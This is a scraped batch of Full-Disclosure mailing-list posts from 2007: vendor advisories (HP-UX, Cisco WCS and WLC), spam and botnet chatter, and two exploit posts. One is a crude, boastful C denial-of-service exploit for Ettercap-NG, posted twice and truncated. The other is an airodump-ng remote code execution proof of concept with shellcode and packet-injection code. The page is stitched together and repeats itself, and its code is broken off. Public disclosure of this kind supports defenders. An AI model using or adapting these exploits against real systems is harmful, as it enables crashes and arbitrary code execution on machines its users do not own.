Re: [Full-disclosure] A Botted Fortune 500 a Day
On 4/13/07, RMueller <[EMAIL PROTECTED]> wrote: > How is the information gathered? The page mentions different types of spam, so it's really just a matter of doing whois lookups / reverse dns checks and stuff like that to see where the stuff comes from. Once you filter out all the end user ranges you can easily do some manual sorting of the list to find "juicy" stuff, aka things that are fun to laugh at. -- Knud ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Ettercap-NG 0.7.3 Remote DoS
/*
WARNING WARNING WARNING
THIS PACKAGE CONTAINS AN 0DAY.
NO ONE CAN BE HELD RESPONSIBLE IF THIS CODE RAPES YOUR SISTER OR
MOLESTS YOUR DOG.
WARNING WARNING WARNING
THE ONE PACKET ETTERCAP KILLER NOW IN A SMALLER PACKAGE!
If you want to know how this works then figure it out yourself.
Tested with Ettercap-NG v 0.7.3 on FreeBSD 6.1 and Slackware 10.1
greetz go out to tip, milkmang, chrak, jcb, rest of b4b0, mosthated,
xtaylor, and rest of global hell,riot, JxT,
p00kie_p0x, tadp0le, #oldskewl, #ubergeeks, #wp, le_kickban for
fucking french women and anyone else I forgot..
REMEBER KIDS EVILRABBI LOVES YOU :*.
gcc -Wall -o b4b0-ettercap b4b0-ettercap.c
./b4b0-ettercap
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define IP struct iphdr
#define TCP struct tcphdr
void usage();
unsigned short ipChecksum(unsigned short *ptr, int nbytes);
void usage()
{
int i;
for (i=0; i < 100; i++) { printf("\n");}
printf(" VVVVVV\n");
printf("V[ T34M B4B0 PROUDLY PRESENTS: ]\n");
printf(" VV VVV\n");
printf(" V b4b0-ettercap.c VVV\n");
printf(" .$&yVV ,p& y&$ VV,aa,\n");
printf("$$' VV,d$$$ $$' V .s$',8P\"'
`\"Y8, . \n");
printf(" yxxx.$$. ,d$\"`$$.x.$$..,8P..s`$$,.xxxg
\n");
printf(" $ P' $$,d$$Yba,,d$\" d $$ $$,d$$Yba, 88
,$.$$$$ \n");
printf(" $ ' $$P' ,`$$a ,d$\" ``\" $$ , $$$P' ,`Y$a 88 ,s$,$$$
. $ \n");
printf(" $$$k g Y$$ $ $$f d d$$ `8b ,$$'d$$' ,d
$ \n");
printf(" bxxx.$$$, '`,d$\"..$$.x.$$b,
',a$$\".x`8ba,,aad$$'.d. . \n");
printf("s$Y\"Y$bd$P',yas. s$$z $Y\"Y$$$P\"'
\"Y(headflux)$ \n");
printf(" \n");
printf(" \n");
printf(" ettercap-ng v0.7.3 \n");
printf(" Denial of Service \n");
printf("by EvilRabbi VV \n");
printf(" <[EMAIL PROTECTED] \n");
printf(" VV \n");
printf(" \n");
printf("./b4b0-ettercap VV \n");
printf(" \n");
printf(" VV \n");
}
unsigned short ipChecksum(unsigned short *ptr, int nbytes)
{
register long sum;
register u_short answer;
u_short oddbyte;
sum = 0;
while (nbytes > 1) {
sum += *ptr++;
nbytes -= 2;
}
if (nbytes == 1) {
oddbyte = 0;
*((u_char *) & oddbyte) = *(u_char *) ptr;
sum += oddbyte;
}
sum = (sum >> 16) + (sum & 0x);
sum += (sum >> 16);
answer = ~sum;
return (answer);
}
int main(int argc, char **argv)
{
int sockfd, opt = 1;
char tcpoptions[4];
char dest[20];
unsigned int pLen,sIPLen;
unsigned char pkt[(pLen = sizeof(IP) + sizeof(TCP) + 4)];
unsigned char ip[(sIPLen = 12 + sizeof(TCP) + 4)];
struct hostent *he;
struct sockaddr_in host;
struct sockaddr_in s;
struct in_addr etter;
IP *iphdr = (IP *)pkt;
TCP *tcphdr = (TCP *)((unsigned char *)pkt + sizeof(IP));
if (getuid() != 0) {
printf("you need to be r00t =(\n");
exit(0);
}
if (argc != 2) {
usage();
exit(0);
}
if ((he=gethostbyname(argv[1])) == NULL) { // get the host info
herror("gethostbyname");
exit(1);
}
snprintf (dest,sizeof(dest)-1,"%d.%d.%d.%d\n", (unsigned
char)he->h_addr_list[0][0],
(unsigned char)he->h_addr_list[0][1],
(unsigned
char)he->h_addr_list[0][2],
(unsigned
char)he->h_addr_list[0][3]);
if ((sockfd = socket(AF_INET,SOCK_RAW,IPPROTO_TCP)) == -1) {
perror("socket");
exit(1);
}
setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,&opt,sizeof(opt));
etter.s_addr = inet_addr(dest);
s.sin_addr.s_addr = INADDR_ANY;
//etter.s_addr = inet_addr("69.46.19.77");
memset(tcpoptions,0,sizeof(tcpoptions));
tcpoptions[0]=0x08;
tcpoptions[1]=0x00;
tcpoptions[2]=0x00;
tcpoptions[3]=0x00;
memset(&host, 0, sizeof(host));
memset(pkt, 0, pLen);
memcpy(pkt+sizeof(IP)+sizeof(TCP), tcpoptions, sizeof(tcpoptions));
memset(ip, 0, sIPLen);
*((unsigned long *)((unsigned char *)ip+0)) = s.sin_addr.s_addr;
*((unsigned long *)((unsigned char *)ip+4)) = etter.s_addr;
*((unsigned char *)((unsigned char *)ip+8)) = 0;
*((unsigned char *)((unsigned char *)ip+9)) = IPPROTO_TCP;
[Full-disclosure] Ettercap-NG 0.7.3 Remote DoS
/*
WARNING WARNING WARNING
THIS PACKAGE CONTAINS AN 0DAY.
NO ONE CAN BE HELD RESPONSIBLE IF THIS CODE RAPES YOUR SISTER OR
MOLESTS YOUR DOG.
WARNING WARNING WARNING
THE ONE PACKET ETTERCAP KILLER NOW IN A SMALLER PACKAGE!
If you want to know how this works then figure it out yourself.
Tested with Ettercap-NG v 0.7.3 on FreeBSD 6.1 and Slackware 10.1
greetz go out to tip, milkmang, chrak, jcb, rest of b4b0, mosthated,
xtaylor, and rest of global hell,riot, JxT,
p00kie_p0x, tadp0le, #oldskewl, #ubergeeks, #wp, le_kickban for
fucking french women and anyone else I forgot..
REMEBER KIDS EVILRABBI LOVES YOU :*.
gcc -Wall -o b4b0-ettercap b4b0-ettercap.c
./b4b0-ettercap
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define IP struct iphdr
#define TCP struct tcphdr
void usage();
unsigned short ipChecksum(unsigned short *ptr, int nbytes);
void usage()
{
int i;
for (i=0; i < 100; i++) { printf("\n");}
printf(" VVVVVV\n");
printf("V[ T34M B4B0 PROUDLY PRESENTS: ]\n");
printf(" VV VVV\n");
printf(" V b4b0-ettercap.c VVV\n");
printf(" .$&yVV ,p& y&$ VV,aa,\n");
printf("$$' VV,d$$$ $$' V .s$',8P\"'
`\"Y8, . \n");
printf(" yxxx.$$. ,d$\"`$$.x.$$..,8P..s`$$,.xxxg
\n");
printf(" $ P' $$,d$$Yba,,d$\" d $$ $$,d$$Yba, 88
,$.$$$$ \n");
printf(" $ ' $$P' ,`$$a ,d$\" ``\" $$ , $$$P' ,`Y$a 88 ,s$,$$$
. $ \n");
printf(" $$$k g Y$$ $ $$f d d$$ `8b ,$$'d$$' ,d
$ \n");
printf(" bxxx.$$$, '`,d$\"..$$.x.$$b,
',a$$\".x`8ba,,aad$$'.d. . \n");
printf("s$Y\"Y$bd$P',yas. s$$z $Y\"Y$$$P\"'
\"Y(headflux)$ \n");
printf(" \n");
printf(" \n");
printf(" ettercap-ng v0.7.3 \n");
printf(" Denial of Service \n");
printf("by EvilRabbi VV \n");
printf(" <[EMAIL PROTECTED] \n");
printf(" VV \n");
printf(" \n");
printf("./b4b0-ettercap VV \n");
printf(" \n");
printf(" VV \n");
}
unsigned short ipChecksum(unsigned short *ptr, int nbytes)
{
register long sum;
register u_short answer;
u_short oddbyte;
sum = 0;
while (nbytes > 1) {
sum += *ptr++;
nbytes -= 2;
}
if (nbytes == 1) {
oddbyte = 0;
*((u_char *) & oddbyte) = *(u_char *) ptr;
sum += oddbyte;
}
sum = (sum >> 16) + (sum & 0x);
sum += (sum >> 16);
answer = ~sum;
return (answer);
}
int main(int argc, char **argv)
{
int sockfd, opt = 1;
char tcpoptions[4];
char dest[20];
unsigned int pLen,sIPLen;
unsigned char pkt[(pLen = sizeof(IP) + sizeof(TCP) + 4)];
unsigned char ip[(sIPLen = 12 + sizeof(TCP) + 4)];
struct hostent *he;
struct sockaddr_in host;
struct sockaddr_in s;
struct in_addr etter;
IP *iphdr = (IP *)pkt;
TCP *tcphdr = (TCP *)((unsigned char *)pkt + sizeof(IP));
if (getuid() != 0) {
printf("you need to be r00t =(\n");
exit(0);
}
if (argc != 2) {
usage();
exit(0);
}
if ((he=gethostbyname(argv[1])) == NULL) { // get the host info
herror("gethostbyname");
exit(1);
}
snprintf (dest,sizeof(dest)-1,"%d.%d.%d.%d\n", (unsigned
char)he->h_addr_list[0][0],
(unsigned char)he->h_addr_list[0][1],
(unsigned
char)he->h_addr_list[0][2],
(unsigned
char)he->h_addr_list[0][3]);
if ((sockfd = socket(AF_INET,SOCK_RAW,IPPROTO_TCP)) == -1) {
perror("socket");
exit(1);
}
setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,&opt,sizeof(opt));
etter.s_addr = inet_addr(dest);
s.sin_addr.s_addr = INADDR_ANY;
//etter.s_addr = inet_addr("69.46.19.77");
memset(tcpoptions,0,sizeof(tcpoptions));
tcpoptions[0]=0x08;
tcpoptions[1]=0x00;
tcpoptions[2]=0x00;
tcpoptions[3]=0x00;
memset(&host, 0, sizeof(host));
memset(pkt, 0, pLen);
memcpy(pkt+sizeof(IP)+sizeof(TCP), tcpoptions, sizeof(tcpoptions));
memset(ip, 0, sIPLen);
*((unsigned long *)((unsigned char *)ip+0)) = s.sin_addr.s_addr;
*((unsigned long *)((unsigned char *)ip+4)) = etter.s_addr;
*((unsigned char *)((unsigned char *)ip+8)) = 0;
*((unsigned char *)((unsigned char *)ip+9)) = IPPROTO_TCP;
Re: [Full-disclosure] patch-9449
see http://www.symantec.com/outbreak/spam-attack-zipped-trojan.html On Thu, Apr 12, 2007 at 08:13:35PM -0500, Matti Ranta wrote: > can you send it so we can dissect it? > > thank you > > On 4/12/07, Steward Smith <[EMAIL PROTECTED]> wrote: > > Hi, > > > > Had a funny spam today that warned about mails coming from my IP address > > and I should apply the attached patch. The filename was named > > patch-9449.exe which was attached in a password protected zip file - > > presumably to fool your virus scanner. > > > > I unpacked it but my up-to-date virus scanner on my Windows XP vmware > > instance cannot detect any malware. > > > > Has anyone else seen this and know what it is? > > > > Stew > > > > ___ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > > -- > Matti Ranta > > This e-mail and any attachments may contain confidential and privileged > information. If you are not the intended recipient, please notify the > sender immediately by return e-mail, delete this e-mail and destroy any > copies. Any dissemination or use of this information by a person other > than the intended recipient is unauthorized and may be illegal. > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] patch-9449
can you send it so we can dissect it? thank you On 4/12/07, Steward Smith <[EMAIL PROTECTED]> wrote: > Hi, > > Had a funny spam today that warned about mails coming from my IP address > and I should apply the attached patch. The filename was named > patch-9449.exe which was attached in a password protected zip file - > presumably to fool your virus scanner. > > I unpacked it but my up-to-date virus scanner on my Windows XP vmware > instance cannot detect any malware. > > Has anyone else seen this and know what it is? > > Stew > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- Matti Ranta This e-mail and any attachments may contain confidential and privileged information. If you are not the intended recipient, please notify the sender immediately by return e-mail, delete this e-mail and destroy any copies. Any dissemination or use of this information by a person other than the intended recipient is unauthorized and may be illegal. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] patch-9449
Hi, Had a funny spam today that warned about mails coming from my IP address and I should apply the attached patch. The filename was named patch-9449.exe which was attached in a password protected zip file - presumably to fool your virus scanner. I unpacked it but my up-to-date virus scanner on my Windows XP vmware instance cannot detect any malware. Has anyone else seen this and know what it is? Stew ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Argeniss] Hacking Databases for owning your data (paper)
Abstract: Data theft is becoming a major threat, criminals have identified where the money is. In the last years many databases from fortune 500 companies were compromised causing lots of money losses. This paper will discuss the data theft problem focusing on database attacks, we will show actual information about how serious the data theft problem is, we will explain why you should care about database security and common attacks will be described, the main part of the paper will be the demonstration of unknown and not well known attacks that can be used or are being used by criminals to easily steal data from your databases, we will focus on most used database servers: MS SQL Server and Oracle Database, it will be showed how to steal a complete database from Internet, how to steal data using a database rootkit and backdoor and some advanced database 0day exploits. We will demonstrate that compromising databases is not big deal if they haven't been properly secured. Also it will be discussed how to protect against attacks so you can improve database security at your site. http://www.argeniss.com/research/HackingDatabases.zip (Tools and exploits included) Enjoy. Cesar. Looking for earth-friendly autos? Browse Top Cars by "Green Rating" at Yahoo! Autos' Green Center. http://autos.yahoo.com/green_center/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] A Botted Fortune 500 a Day
Gadi wrote: -- Message: 8 Date: Wed, 11 Apr 2007 21:35:47 -0500 (CDT) From: Gadi Evron <[EMAIL PROTECTED]> Subject: [Full-disclosure] A Botted Fortune 500 a Day To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED] Message-ID: <[EMAIL PROTECTED]> Content-Type: TEXT/PLAIN; charset=US-ASCII Support Intelligence releases daily reports on different fortune 500 companies which are heavily affected by the botnet problem, with many compromised machines on their networks. You can find more information on their blog: http://blog.support-intelligence.com/ They are good people, and they know botnets. Gadi. -- How is the information gathered? ___ Fidelity Communications Webmail - http://webmail.fidnet.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Spam is funny!
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 In my last article at Security Focus, I mentioned that phishing is directed (based on your online profile) and not blast-o-gram (everyone gets one). My example used Arizona. I said: For example, if you are likely in Arizona then you are more likely to receive an Arizona Credit Union phish. They can guess where you are based on the forums you use. If you post in a Tucson forum or write about Flagstaff and Phoenix, then you might be in Arizona. Well, the email address associated with that article just received an Arizona State Credit Union phish. It had never received one of those before. Man, spammers are predictable and funny. - - Dr Neal Krawetz, PhD Author of "Yggdrasil Linux Unleashed" and "Other Stupid Shit" -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.5 wpwEAQECAAYFAkYelIEACgkQDpFP8dW5K4ZSdwQAjZjHeOH8WsgSLxe/atggwHeeS3JJ G9YrofzEMHKjJwiw1qdDMzFHds9GhJAraCqSIUN1dgJfqphQB9nara5grgqjLmDfRLKP +wFoCwFpgHVWtmVGRa5rDfdmI0Y/QyI1j554HM4JW3DSxZsvDv9GbR14b6NC4YWdJJ7Y cZcNHv8= =Sa1l -END PGP SIGNATURE- -- Click for free info on Hollywood careers and quit your boring job http://tagline.hushmail.com/fc/CAaCXv1I4towGaUULqchcd3HA37FooZr/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] iDefense Security Advisory 04.12.07: Hewlett Packard HP-UX Remote pfs_mountd.rpc Buffer Overflow Vulnerability
Hewlett Packard HP-UX Remote pfs_mountd.rpc Buffer Overflow Vulnerability iDefense Security Advisory 04.12.07 http://labs.idefense.com/intelligence/vulnerabilities/ Apr 12, 2007 I. BACKGROUND PFS (the Portable File System) allows mounting of ISO 9660, High Sierra, and Rock Ridge (ISO 9660 with Rock Ridge extensions) CD-ROM disks. The daemon pfs_mountd.rpc is an RPC extension that is launched along with pfsd in order to allow the easy mounting of these file systems under HP-UX. It is remotely accessible over TCP and UDP. II. DESCRIPTION Remote exploitation of a buffer overflow vulnerability in pfs_mountd.rpc included in multiple versions of Hewlett Packard Co. HP-UX allows for remote root access. If a remote user sends two specially crafted packets over UDP, the buffer overflow is triggered. One must first send a call to procedure 5, and soon thereafter send the actual payload to procedure 2. Due to the closed nature of the pfs_mountd.rpc protocol specification, it is unclear at this time what functions the respective procedures actually perform. III. ANALYSIS The seriousness of this vulnerability is reduced by the fact that in most cases an attacker will only have one chance at exploitation until an administrator restarts the crashed daemon after a failed attempt. However, the attack is functional over UDP, thus allowing an attacker to completely spoof the attack, possibly even making it appear from inside a trusted network. IV. DETECTION iDefense has confirmed the existence of this vulnerability in HP-UX 11.11i. It is suspected that previous versions are also vulnerable. V. WORKAROUND Adding firewall rules may not be enough to stop this attack due to the fact that it can be spoofed. VI. VENDOR RESPONSE Hewlett-Packard discontinued support for the PFS on March 1st, 2004. As a solution to this vulnerability, Hewlett-Packard recommends discontinuing the use of PFS. More information is available from HP Security Bulletin HPSBUX02203 at the following URL. http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=c00913684 VII. CVE INFORMATION A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet. VIII. DISCLOSURE TIMELINE 10/25/2004 Initial vendor notification 10/25/2004 Initial vendor response 12/19/2005 Second vendor notification 01/30/2007 Third vendor notification 04/12/2007 Coordinated public disclosure IX. CREDIT This vulnerability was discovered by iDefense Labs. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright © 2007 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] A Botted Fortune 500 a Day
Maybe they can use this site also! On 4/11/07, Gadi Evron <[EMAIL PROTECTED]> wrote: Support Intelligence releases daily reports on different fortune 500 companies which are heavily affected by the botnet problem, with many compromised machines on their networks. You can find more information on their blog: http://blog.support-intelligence.com/ They are good people, and they know botnets. Gadi. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com/watches.asp?Brand=39 http://www.wazoozle.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Aircrack-ng (airodump-ng) remote buffer overflow vulnerability
Product Name: Aircrack-ng (0.7)
Vendor: http://www.aircrack-ng.org
Date: 12 April, 2007
Author: Jonathan So < jonny [ @ ] nop-art [ dot ] net>
Advisory URL: http://www.nop-art.net/advisories/airodump-ng.txt
I. DESCRIPTION
A buffer overflow vulnerability has been found in airodump-ng, part of
the aircrack-ng package. The vulnerability could allow an attacker to
transmit specially crafted 802.11 packets to execute arbitrary code on
a remote machine running the airodump-ng tool.
II. DETAILS
Airodump-ng fails to check the size of 802.11 authentication packets
before copying into an insufficiently sized global buffer. As a result
it is possible to overwrite another global variable passed as the size
parameter to a subsequent memcpy() operation, in order to overflow a
stack buffer. Airodump-ng must be logging packets with the -w or
--write option to be vulnerable to this attack. The wireless device
must also be capturing packets in monitor mode.
This vulnerability has been successfully exploited against on an x86
Linux 2.6.20 machine running airodump-ng 0.7. Other versions and
platforms are also likely to be affected.
III. VENDOR RESPONSE
According to the vendor the vulnerability is now fixed in the latest
stable release.
IV. CREDIT
Discovered by Jonathan So
Additional thanks to Ash Willis
V. EXPLOIT
/**
* airodump-exp.c - aircrack/airodump-ng (0.7) remote exploit
*
* Proof of concept exploit for a stack (and heap) based
* overflow in airodump-ng. The vulnerability can be exploited
* by transmitting some specially crafted 802.11 packets to
* execute arbitrary code on any machines within range
* that are sniffing with a vulnerable version of airodump-ng.
*
* This exploit requires the lorcon 802.11 packet injection
* library, see http://802.11ninja.net for details.
*
* Compiling:
*
* gcc -o airodump-remote airodump-remote.c -lorcon
*
* Usage:
*
* ./airodump-ng [return addr]
*
* Drivers supported by lorcon:
*
* wlan-ng, hostap, airjack, prism54, madwifing, madwifiold,
* rtl8180, rt2570, rt2500, rt73, rt61, zd1211rw
*
* Header types:
*
* 0 - None (not tested)
* 1 - Fake prism54 header
* 2 - Fake radiotap header (not tested)
*
* Return addresses:
*
* Backtrack Linux 2 (2.6.20) aircrack-ng 0.7 - 0x8054934
* Gentoo Linux (2.6.16) aircrack-ng 0.7 - 0x8055934
*
* Example usage:
*
* ./airodump-ng wlan0 prism54 11 1 0x8054934
*
* Original advisory: http://www.nop-art.net/advisories/airodump-ng.txt
* Author: Jonathan So [ jonny [ @ ] nop-art.net ]
*
* Copyright (C) 2007 Jonathan So
*/
#include
#include
#include
// Linux x86 sys_write shellcode. Any arbitrary shellcode should work
// here, it doesn't matter if it contains nulls. Maximum 792 bytes.
char shellcode[] = "\xeb\x14" // jmp get_message
// start:
"\x59\x31\xdb\x31\xd2\xb2"
"\x1b" // message length
"\x31\xc0\x88\x04\x11"
"\xb0\x04\xcd\x80" // sys_write
"\xb0\x01\xcd\x80" // sys_exit
// get_message:
"\xe8\xe7\xff\xff\xff" // call start
"Stop sniffing our network!!"; // message text
int main(int argc, char **argv)
{
tx80211_t tx;
tx80211_packet_t txp;
uint8_t packet[1044];
uint8_t *ppacket;
int headertype;
unsigned ret_addr = 0x8054934;
FILE *fp;
if(argc<5) {
printf("usage: %s
[ret_addr]\n", argv[0]);
exit(1);
}
if(argc>5) {
ret_addr = strtoul(argv[5], NULL, 16);
}
headertype = atoi(argv[4]);
if ( tx80211_init(&tx, argv[1], tx80211_resolvecard(argv[2])) !=
TX80211_ENOERR) {
fprintf(stderr, "Error initializing driver");
return 1;
}
if (tx80211_setfunctionalmode(&tx, TX80211_FUNCMODE_INJMON) !=
TX80211_ENOERR) {
fprintf(stderr, "Error setting inject mode\n");
return 1;
}
if (tx80211_setchannel(&tx, atoi(argv[3])) < 0) {
fprintf(stderr, "Error setting channel\n");
}
if (tx80211_open(&tx) < 0) {
fprintf(stderr, "Unable to open interface\n");
return 1;
}
txp.packet = packet;
// Fill packet with nops
memset(packet, 0x90, sizeof(packet));
switch (headertype) {
case 0:
// No arptype, just send raw packet
ppacket = packet;
break;
case 1:
// Send fake prism header
memcpy(packet+4, "\x08\x00\x00\x00", 4);
ppacket = packet + 8;
break;
case 2:
// Send fake radiotap header
packet[0] = 0;
packet[2] = 3;
ppacket = packet + 3;
break;
default:
printf("Invalid header type. Valid options are:\n");
printf(" 0 - none\n");
printf(" 1 - prism5
[Full-disclosure] Cisco Security Advisory: Multiple Vulnerabilities in the Cisco Wireless Control System
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Cisco Security Advisory: Multiple Vulnerabilities in the Cisco Wireless Control System Advisory ID: cisco-sa-20070412-wcs http://www.cisco.com/warp/public/707/cisco-sa-20070412-wcs.shtml Revision 1.0 For Public Release 2007 April 12 1600 UTC (GMT) - - Summary === The Cisco Wireless Control System (WCS) works in conjunction with Cisco Aironet Lightweight Access Points, Cisco Wireless LAN Controllers, and the Cisco Wireless Location Appliance by providing tools for wireless LAN planning and design, system configuration, location tracking, security monitoring, and wireless LAN management. Cisco WCS contains multiple vulnerabilities that can result in information disclosure, privilege escalation, and unauthorized access through fixed authentication credentials. Cisco has released free software updates that address these vulnerabilities. Workarounds that mitigate these vulnerabilities are available. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070412-wcs.shtml. Affected Products = This section provides details on affected products. Vulnerable Products +-- Versions of WCS prior to 4.0.96.0 are affected by one or more of these vulnerabilities. To identify the first fixed version for a specific Cisco Bug ID, please see the Software Versions and Fixes section of this advisory. To determine the version of WCS running in a given environment, take the following steps: 1. Log in to the WCS graphical web interface. 2. From the menu, select Help > About the Software. Products Confirmed Not Vulnerable + No other Cisco products are currently known to be affected by these vulnerabilities. Details === The Cisco Wireless Control System (WCS) works in conjunction with Cisco Aironet Lightweight Access Points, Cisco Wireless LAN Controllers, and the Cisco Wireless Location Appliance by providing tools for wireless LAN planning and design, system configuration, location tracking, security monitoring, and wireless LAN management. Cisco WCS contains the following vulnerabilities: Fixed FTP Credentials For WCS Location Backup + WCS can be configured to back up the data stored on the Cisco Wireless Location Appliance via FTP. Affected versions of WCS include a fixed user name and password for this backup operation; these credentials cannot be changed or disabled. Knowledge of these credentials, when combined with other properties of the FTP server, could allow an attacker to read from and write to arbitrary files on the server hosting the WCS application. In some cases, this could be leveraged to alter system files and compromise the server. This vulnerability is documented by Cisco Bug ID CSCse93014. Account Group Privilege Escalation +- The WCS authentication system contains a privilege escalation vulnerability that allows any user with a valid user name and password to change their account group membership. For example, a user in the "LobbyAmbassador" group can add themselves to the "SuperUsers" group. This privilege escalation can allow full administrative control of WCS and the wireless networks it manages. This vulnerability is documented by Cisco Bug IDs CSCse78596 and CSCsg05190. Information Disclosure to Unauthenticated Users +-- On affected versions of WCS, several directories within the WCS page hierarchy are not password protected and could be accessed by an unauthenticated user. Although the information available would not allow an attacker to gain access to WCS, it would be possible to obtain information about the organization of the network, including access point locations. This vulnerability is documented by Cisco Bug ID CSCsg04301. Vulnerability Scoring Details = Cisco is providing scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). Cisco will provide a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco PSIRT will set the bias in all cases to normal. Customers are encouraged to apply the bias parameter when determining the environmental impact of a particular vulnerability. CVSS is a standards based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided an FAQ to answer additional questions regarding CVSS at http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html. Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at http://intellishield.cisco.com/security/alertmanager/cvss. CSCse93014 - Fixed
[Full-disclosure] Cisco Security Advisory: Multiple Vulnerabilities in the Cisco Wireless LAN Controller and Cisco Lightweight Access Points
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Cisco Security Advisory: Multiple Vulnerabilities in the Cisco Wireless LAN Controller and Cisco Lightweight Access Points Advisory ID: cisco-sa-20070412-wlc http://www.cisco.com/warp/public/707/cisco-sa-20070412-wlc.shtml Revision 1.0 For Public Release 2007 April 12 1600 UTC (GMT) - - Summary === The Cisco Wireless LAN Controller (WLC) manages Cisco Aironet access points using the Lightweight Access Point Protocol (LWAPP). The WLC contains multiple vulnerabilities that could result in a denial of service (DoS) condition, information disclosure, or access control list changes, or allow an attacker to gain full administrative access. Cisco has made free software available to address this vulnerability for affected customers. There are workarounds available to mitigate the effects of these vulnerabilities. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070412-wlc.shtml. Affected Products = This section provides details on affected products. Vulnerable Products +-- This sections describes the vulnerable products. Vulnerable Software +-- The vulnerabilities addressed in this document affect versions 4.0, 3.2, and prior versions of the Wireless LAN Controller software. To identify the first fixed version for a specific Cisco Bug ID, please see the Software Versions and Fixes section of this advisory. To determine the version of WLC running in a given environment, use one of the following methods: * In the web interface, choose the Monitor tab, click Summary in the left-hand pane, and note the "Software Version." * From the command-line interface, type show sysinfo and note the "Product Version." Vulnerable Hardware +-- Wireless LAN Controllers * Cisco 4400 Series Wireless LAN Controllers * Cisco 2100 Series Wireless LAN Controllers * Cisco Wireless LAN Controller Module Wireless Integrated Switches and Routers * Cisco Catalyst 6500 Series Wireless Services Module (WiSM) * Cisco Catalyst 3750 Series Integrated Wireless LAN Controllers * Cisco Wireless LAN Controller Module Cisco Aironet Access Points * Cisco Aironet 1000 Series * Cisco Aironet 1500 Series Products Confirmed Not Vulnerable + * Cisco Aironet 1400 Series * Cisco Aironet 1300 Series * Cisco Aironet 1240 AG Series * Cisco Aironet 1230 AG Series * Cisco Aironet 1200 Series * Cisco Aironet 1130 AG Series * Cisco Aironet 1100 Series No other Cisco products are currently known to be affected by these vulnerabilities. Details === The Cisco Wireless LAN Controller (WLC) manages Cisco Aironet access points using the Lightweight Access Point Protocol (LWAPP). This protocol provides centralized management of wireless networks. The WLC contains the following vulnerabilities: Default SNMP Community Strings +- The WLC uses the commonly known values of "public" and "private" for its read-only and read-write SNMP community strings. This vulnerability is documented by Cisco Bug ID CSCse02384. Malformed Ethernet Traffic Crash +--- The WLC may crash in response to malformed Ethernet traffic. This vulnerability is documented by Cisco Bug ID CSCsc90179. Multiple NPU Lock-Up Vulnerabilities +--- The Network Processing Unit (NPU) is responsible for handling traffic within the WLC. It is possible to cause one or more NPUs to lock up by sending certain types of traffic to an affected WLC. This traffic includes crafted SNAP packets, malformed 802.11 traffic, and packets with unexpected length values in certain headers. Each NPU operates independently and serves two of the physical ports on the WLC. A lock up in one NPU does not affect the others, so the number of NPUs available and the configuration of the device determine whether these vulnerabilities result in a partial or complete inability to forward traffic. To clear a NPU lock up, the WLC must be restarted. If the lock up condition prevents access to the management interface, the restart must be performed via the console port or service port. Devices that implement the WLC functionality in software rather than hardware do not contain a NPU and are not affected by these vulnerabilities. These software-based devices are the 2000 Series WLC, the 2100 Series WLC, and the Cisco Wireless LAN Controller Module. These vulnerabilities are documented by Cisco Bug IDs 